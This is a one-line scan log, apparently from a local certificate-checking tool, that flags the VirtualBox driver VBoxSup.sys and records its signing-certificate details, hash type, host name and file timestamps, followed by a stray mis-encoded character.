    datetime="2023-03-06 20:33:47",scan_id="033976ae-46cb-4c2e-a357-734353f7e09a",os_version="Windows",hostname="DESKTOP-S5VJGLH",ip_address="192.168.0.23",infected_file="F:\code\pythonProject\certverify\test\VBoxSup.sys",signature_hash="sha256",serial_number="2f451139512f34c8c528b90bca471f767b83c836",thumbprint="3aa166713331d894f240f0931955f123873659053c172c4b22facd5335a81346",subject_name="VirtualBox for Legacy Windows Only Timestamp Kludge 2014",issuer_name="VirtualBox for Legacy Windows Only Timestamp CA",file_created_at="2023-03-03 23:20:43",file_modified_at="2022-10-11 08:11:56"


    โŒ